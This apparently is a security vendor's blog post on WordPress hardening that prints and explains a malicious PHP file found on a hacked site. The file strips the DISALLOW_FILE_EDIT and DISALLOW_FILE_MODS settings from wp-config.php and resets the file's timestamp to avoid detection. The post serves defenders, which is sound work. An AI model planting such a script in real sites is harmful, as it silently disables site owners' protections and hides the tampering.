Hardening is the process of securing a website or system against known security weaknesses or potential issues to reduce the attack surface. The more functions or features a website has, the more potential points of entry an attacker has to leverage.
For example, a popular method for hardening WordPress installations is to disable the backend theme and plugin editor, which normally allows direct modification to the code in any theme or plugin file.
Theme & Plugin Installers Used as Entry Points
Attackers can also take advantage of the theme and plugin installers within the wp-admin backend. However, instead of installing a legitimate theme or plugin, they use this feature to install a backdoor and maintain access to a compromised website.
Thankfully, WordPress has a feature that allows website owners to disable both the theme and plugin file editors and installers.
To accomplish this, the owner just needs to add a line to their wp-config.php file:
define( 'DISALLOW_FILE_EDIT', true ); //disables file editor define( 'DISALLOW_FILE_MODS', true ); //disables both file editor and installer
Hardening Methods Reversed in wp-config.php
Since hackers are aware of the attack surface areas, it also makes sense that they would be aware of the most popular hardening methods and respond accordingly.
During a recent website cleanup, the following file was added to the hacked website to reverse the hardening method we described for wp-config.php.
./wp-admin/maint/replace.php:
<?php
$str = file_get_contents("../../wp-config.php");
$str = str_replace("define('DISALLOW_FILE_EDIT', true);","",$str);
$str = str_replace("define('DISALLOW_FILE_MODS', true);","",$str);
$ftime1 = filemtime("../../wp-config.php");
file_put_contents("../../wp-config.php", $str);
touch("../../wp-config.php", $ftime1, $ftime1);
echo "okok.";
?>
In this example, we found the malicious replace.php script in ./wp-admin/maint/.
When running the PHP script, it looks for wp-config.php (two directory levels above its current location). It then uses str_replace to search for DISALLOW_FILE_EDIT and DISALLOW_FILE_MODS, and looks up the modification timestamp for the wp-config.php file before removing the detected str_replace strings.
After the contents of the wp-config.php file have been adjusted, the script finally uses the touch function to alter the modification timestamp on the wp-config.php file in order to avoid detection.
Conclusion
In this particular case, the hacker compromised the website with an entirely different method and then added this malicious PHP file to further weaken the overall security of the website.
Unfortunately, there are a variety of other ways for hackers to compromise a website without using the theme and plugin editors or installers.
Employing a file integrity monitoring service like the free Sucuri WordPress plugin can be extremely helpful for early detection of a website hack. File integrity monitors won’t be fooled by altered timestamps. They are designed to alert website owners as soon as any changes to files are made against the baseline or last known good configuration.
